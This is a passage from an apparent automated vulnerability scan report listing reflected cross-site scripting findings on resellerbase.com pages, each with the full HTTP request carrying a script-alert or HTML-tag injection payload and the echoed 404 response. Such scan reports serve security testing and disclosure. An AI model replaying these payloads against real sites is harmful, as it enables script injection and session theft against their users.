<p>The requested URL /detail/4150b52<script>alert(1)</script>fc0263d503a/ was not found on this server.</p>
...[SNIP]...

2.2905. http://www.resellerbase.com/detail/41/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/41/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload d0496<script>alert(1)</script>63d019099f5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41/?d0496<script>alert(1)</script>63d019099f5=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/?d0496<script>alert(1)</script>63d019099f5=1 was not found on this server.</p>
...[SNIP]...

2.2906. http://www.resellerbase.com/detail/41/nudistfriends-com.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/41/nudistfriends-com.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 96711<script>alert(1)</script>b2a08b935b3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail96711<script>alert(1)</script>b2a08b935b3/41/nudistfriends-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:25:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail96711<script>alert(1)</script>b2a08b935b3/41/nudistfriends-com.html was not found on this server.</p>
...[SNIP]...

2.2907. http://www.resellerbase.com/detail/41/nudistfriends-com.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/41/nudistfriends-com.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 61e88<a>34b6200dcc7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/4161e88<a>34b6200dcc7/nudistfriends-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:25:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4161e88<a>34b6200dcc7/nudistfriends-com.html was not found on this server.</p>
...[SNIP]...

2.2908. http://www.resellerbase.com/detail/41/nudistfriends-com.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/41/nudistfriends-com.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4b6bd<script>alert(1)</script>dbc45171972 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41/4b6bd<script>alert(1)</script>dbc45171972 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:26:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/4b6bd<script>alert(1)</script>dbc45171972 was not found on this server.</p>
...[SNIP]...

2.2909. http://www.resellerbase.com/detail/41/rating.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/41/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 54df8<script>alert(1)</script>5343846389b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail54df8<script>alert(1)</script>5343846389b/41/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:32:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail54df8<script>alert(1)</script>5343846389b/41/rating.php was not found on this server.</p>
...[SNIP]...

2.2910. http://www.resellerbase.com/detail/41/rating.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/41/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ae04c<script>alert(1)</script>d1e8a3d2586a6d3e7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detailae04c<script>alert(1)</script>d1e8a3d2586a6d3e7/41/rating.php?id=41&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/nudistfriends-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailae04c<script>alert(1)</script>d1e8a3d2586a6d3e7/41/rating.php?id=41&rating=5 was not found on this server.</p>
...[SNIP]...

2.2911. http://www.resellerbase.com/detail/41/rating.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/41/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4bc3a<script>alert(1)</script>0c2221b7c4fd77228 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/414bc3a<script>alert(1)</script>0c2221b7c4fd77228/rating.php?id=41&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/nudistfriends-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/414bc3a<script>alert(1)</script>0c2221b7c4fd77228/rating.php?id=41&rating=5 was not found on this server.</p>
...[SNIP]...

2.2912. http://www.resellerbase.com/detail/41/rating.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/41/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 28e85<script>alert(1)</script>ee8adf590b5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4128e85<script>alert(1)</script>ee8adf590b5/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:33:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4128e85<script>alert(1)</script>ee8adf590b5/rating.php was not found on this server.</p>
...[SNIP]...

2.2913. http://www.resellerbase.com/detail/41/rating.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/41/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 58f61<script>alert(1)</script>5a0fca9b53c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41/rating.php58f61<script>alert(1)</script>5a0fca9b53c HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:33:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/rating.php58f61<script>alert(1)</script>5a0fca9b53c was not found on this server.</p>
...[SNIP]...

2.2914. http://www.resellerbase.com/detail/41/rating.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/41/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 63dc3<script>alert(1)</script>93df9e2b0beee2f2e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/41/rating.php63dc3<script>alert(1)</script>93df9e2b0beee2f2e?id=41&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/nudistfriends-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/rating.php63dc3<script>alert(1)</script>93df9e2b0beee2f2e?id=41&rating=5 was not found on this server.</p>
...[SNIP]...

2.2915. http://www.resellerbase.com/detail/41/rating.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/41/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 37c0a<script>alert(1)</script>6f4d0b3ba4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41/rating.php?37c0a<script>alert(1)</script>6f4d0b3ba4=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:32:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/rating.php?37c0a<script>alert(1)</script>6f4d0b3ba4=1 was not found on this server.</p>
...[SNIP]...

2.2916. http://www.resellerbase.com/detail/41/rating.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/41/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c7ead<script>alert(1)</script>58441959583be6b7b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/41/rating.php/c7ead<script>alert(1)</script>58441959583be6b7b?id=41&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/nudistfriends-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/rating.php/c7ead<script>alert(1)</script>58441959583be6b7b?id=41&rating=5 was not found on this server.</p>
...[SNIP]...

2.2917. http://www.resellerbase.com/detail/41/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/41/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload dd9d7<script>alert(1)</script>380eb22f0a7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaildd9d7<script>alert(1)</script>380eb22f0a7/41/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/nudistfriends-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaildd9d7<script>alert(1)</script>380eb22f0a7/41/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2918. http://www.resellerbase.com/detail/41/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/41/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ce2f7<script>alert(1)</script>2f0af4d4ad was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41ce2f7<script>alert(1)</script>2f0af4d4ad/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/nudistfriends-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41ce2f7<script>alert(1)</script>2f0af4d4ad/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2919. http://www.resellerbase.com/detail/41/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/41/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 92eb5<script>alert(1)</script>241b218a9d6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41/search.php92eb5<script>alert(1)</script>241b218a9d6?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/nudistfriends-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/search.php92eb5<script>alert(1)</script>241b218a9d6?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2920. http://www.resellerbase.com/detail/41/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/41/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 4d225<a>9a4d1d93371 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/41/search.php?keyword=search...&Submit3=Search4d225<a>9a4d1d93371&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/nudistfriends-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/search.php?keyword=search...&Submit3=Search4d225<a>9a4d1d93371&opt=2 was not found on this server.</p>
...[SNIP]...

2.2921. http://www.resellerbase.com/detail/41/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/41/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 1b7bb<a>70988755916 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/41/search.php?keyword=search...1b7bb<a>70988755916&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/nudistfriends-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/search.php?keyword=search...1b7bb<a>70988755916&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2922. http://www.resellerbase.com/detail/41/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/41/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 46a64<script>alert(1)</script>16d4c80cb20 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41/search.php?keyword=search...&Submit3=Search&opt=2&46a64<script>alert(1)</script>16d4c80cb20=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/nudistfriends-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/search.php?keyword=search...&Submit3=Search&opt=2&46a64<script>alert(1)</script>16d4c80cb20=1 was not found on this server.</p>
...[SNIP]...

2.2923. http://www.resellerbase.com/detail/41/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/41/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 4e12e<a>d02514c8309 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/41/search.php?keyword=search...&Submit3=Search&opt=24e12e<a>d02514c8309 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/nudistfriends-com.html
